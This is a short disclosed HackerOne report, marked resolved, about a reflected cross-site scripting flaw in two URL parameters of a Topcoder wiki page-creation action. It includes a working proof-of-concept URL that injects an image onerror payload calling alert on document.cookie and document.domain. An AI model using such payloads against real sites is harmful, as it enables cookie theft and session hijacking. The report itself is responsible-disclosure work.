Reflected XSS on https://apps.topcoder.com/wiki/pages/createpage.action

Disclosed: 2020-05-12 13:47:56 By meryem0x To lab45
Medium
Vulnerability Details
## Summary: Hi :) A reflected XSS occurs on https://apps.topcoder.com/wiki/pages/createpage.action when creating wiki pages. ## Steps To Reproduce: A user can create wiki pages on https://apps.topcoder.com/wiki/pages/createpage.action?spaceKey=tcwiki. In this url `parentPageString` and `labelsString` parameters are vulnerable to XSS. PoC: https://apps.topcoder.com/wiki/pages/createpage.action?spaceKey=tcwiki&parentPageString=powerpuff_hackerone%22%3E%3Cimg%20src=X%20onerror=alert(document.cookie)%3E&labelsString=%22%3E%3Cimg+src%3DX+onerror%3Dalert(document.domain)%3E {F816308} {F816309} ## Impact XSS can use to steal cookies or to run arbitrary code on victim's browser.
Actions
View on HackerOne
Report Stats
  • Report ID: 866576
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
Share this report